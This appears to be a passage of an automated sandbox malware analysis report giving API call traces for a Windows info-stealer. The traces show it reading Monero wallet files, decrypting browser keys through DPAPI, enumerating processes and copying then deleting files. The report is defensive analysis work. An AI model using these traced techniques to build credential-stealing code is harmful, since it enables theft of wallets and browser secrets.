                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046A2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0046A3FF
                      • lstrlen.KERNEL32(00000000), ref: 0046A6BC
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 0046A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 3693044b813882d0fe4c55fdf33ef0d4dad3f484f1d75a27ba848e313320193a
                      • Instruction ID: 2e48fa1c33489c3f82423089a53169521b683f70216fe0c6a1ce35ac5afd3685
                      • Opcode Fuzzy Hash: 3693044b813882d0fe4c55fdf33ef0d4dad3f484f1d75a27ba848e313320193a
                      • Instruction Fuzzy Hash: 5BE101728101089ACB14FBA5DC92EEE7338AF54304F51C55EF51A72091EF386A1DCB7A
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046D481
                      • lstrlen.KERNEL32(00000000), ref: 0046D698
                      • lstrlen.KERNEL32(00000000), ref: 0046D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0046D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: df09a2780cde28b7545870cc1c75bd44211666e6f1cb9e8583afd4bdeec93a6a
                      • Instruction ID: 7e70d852aec6e48773f093cfc96f7e584932e6a9a8062126145ccacaf7f802c7
                      • Opcode Fuzzy Hash: df09a2780cde28b7545870cc1c75bd44211666e6f1cb9e8583afd4bdeec93a6a
                      • Instruction Fuzzy Hash: 469133719101049BCB04FBA1DC52EEE7339AF94308F51852EF11B62091EF386A19CB7B
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046D801
                      • lstrlen.KERNEL32(00000000), ref: 0046D99F
                      • lstrlen.KERNEL32(00000000), ref: 0046D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0046DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: c911988b6fdd770c3664b71b3e1c34c1be0031b4a206e787fbeeab45235b06eb
                      • Instruction ID: db47bf7c755c25c4a6afb8a85471aac8b9e77e15126258a5de92407b6ed76ace
                      • Opcode Fuzzy Hash: c911988b6fdd770c3664b71b3e1c34c1be0031b4a206e787fbeeab45235b06eb
                      • Instruction Fuzzy Hash: CF8124719101049BCB04FBA5DC51EEE7339AF94304F51852EF11BA6091EF386A19CBBB
                      Strings
                      • sG, xrefs: 004772AE, 00477179, 0047717C
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0047718C
                      • sG, xrefs: 00477111
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: sG$sG$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 3722407311-2141367415
                      • Opcode ID: 55ea1cfb8864e2a39a2cefdd8ffe828bd3719c9c314b2caa9f333a1ef7a272d4
                      • Instruction ID: e81e371335b8922a2bd5a0036806748dcbeb0df97fbd69a22070f493df917d8b
                      • Opcode Fuzzy Hash: 55ea1cfb8864e2a39a2cefdd8ffe828bd3719c9c314b2caa9f333a1ef7a272d4
                      • Instruction Fuzzy Hash: 045183B0D042189BDB14EBA0DC41BEEB374EF44304F5084AEE51976282EB786E88CF5D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: bda3686f6c2e4ddf1cdb215ad0f166227c3e7830661ca54d310867d3d8e9acc7
                      • Instruction ID: ab577862e92d244677bebf88a308f5bf9b07cf71962df3e9652260dddd380fd0
                      • Opcode Fuzzy Hash: bda3686f6c2e4ddf1cdb215ad0f166227c3e7830661ca54d310867d3d8e9acc7
                      • Instruction Fuzzy Hash: E74181B1D10108AFCB04EFE5C845AEEB774AF44305F10C41EE51A77290DB78AA09DFAA
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00469D39
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469AEF
                        • Part of subcall function 00469AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00464EEE,00000000,?), ref: 00469B01
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469B2A
                        • Part of subcall function 00469AC0: LocalFree.KERNEL32(?,?,?,?,00464EEE,00000000,?), ref: 00469B3F
                        • Part of subcall function 00469B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00469B84
                        • Part of subcall function 00469B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00469BA3
                        • Part of subcall function 00469B60: LocalFree.KERNEL32(?), ref: 00469BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 6232cd773923328ddd910d3e043a260bedf30209da332b430fb004f72493aa6f
                      • Instruction ID: 7155c61c070fb25bb52d792263806b18a6a85a5d370b7895acf71c3b3d89788f
                      • Opcode Fuzzy Hash: 6232cd773923328ddd910d3e043a260bedf30209da332b430fb004f72493aa6f
                      • Instruction Fuzzy Hash: 1C3133B5D1010AABCB04DBE4DC85AEFB7BCAB44308F14452AE505A7241F7789E05CBA6
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004805B7), ref: 004786CA
                      • Process32First.KERNEL32(?,00000128), ref: 004786DE
                      • Process32Next.KERNEL32(?,00000128), ref: 004786F3
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • CloseHandle.KERNEL32(?), ref: 00478761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 74e46cec694caf56f3b94658ea2bf99406a4e879b9ba6b8788fb7f12d2f05001
                      • Instruction ID: 8f865b520cd0bea4946740f49a3da77e9024b3a902e7b6e073f8e28928a0aaaa
                      • Opcode Fuzzy Hash: 74e46cec694caf56f3b94658ea2bf99406a4e879b9ba6b8788fb7f12d2f05001
                      • Instruction Fuzzy Hash: EB314D71901218ABCB24EF95CC45FEEB778EF45704F10859EE10EA21A0DB386A45CFA6
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00480E00,00000000,?), ref: 004779B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 004779B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00480E00,00000000,?), ref: 004779C4
                      • wsprintfA.USER32 ref: 004779F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: 76877ae55c1203f12bf284b6c5d315f1f8fc6e8ceca9ca635aeb1017e6f94d5e
                      • Instruction ID: c740980b9b1cdac16bcaa22384d77e1a0cd6e03cd32a119ca4b25556b0b385d6
                      • Opcode Fuzzy Hash: 76877ae55c1203f12bf284b6c5d315f1f8fc6e8ceca9ca635aeb1017e6f94d5e
                      • Instruction Fuzzy Hash: CF1115B2904118AACB149FC9DD45BBEB7F9EB49B11F10421AF605A2280E33D6940CBB5
                      APIs
                      • __getptd.LIBCMT ref: 0047C74E
                        • Part of subcall function 0047BF9F: __amsg_exit.LIBCMT ref: 0047BFAF
                      • __getptd.LIBCMT ref: 0047C765
                      • __amsg_exit.LIBCMT ref: 0047C773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0047C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 9f6dbb89524ddfda0b606d6469fc65fab21e51edcf47697c0dfe960ff0c87163
                      • Instruction ID: 51f02f6eeeb9a1d836a9ac88752f38713f58e4cd73e6340ef319baf918044442
                      • Opcode Fuzzy Hash: 9f6dbb89524ddfda0b606d6469fc65fab21e51edcf47697c0dfe960ff0c87163
                      • Instruction Fuzzy Hash: BBF06D329006019BD724BBB958867CE33A0AF00B28F20C54FF40CA62D2CF6C59519F9E
                      APIs
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00474F7A
                      • lstrcat.KERNEL32(?,00481070), ref: 00474F97
                      • lstrcat.KERNEL32(?,00E88990), ref: 00474FAB
                      • lstrcat.KERNEL32(?,00481074), ref: 00474FBD
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 0047492C
                        • Part of subcall function 00474910: FindFirstFileA.KERNEL32(?,?), ref: 00474943
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FDC), ref: 00474971
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FE0), ref: 00474987
                        • Part of subcall function 00474910: FindNextFileA.KERNEL32(000000FF,?), ref: 00474B7D
                        • Part of subcall function 00474910: FindClose.KERNEL32(000000FF), ref: 00474B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
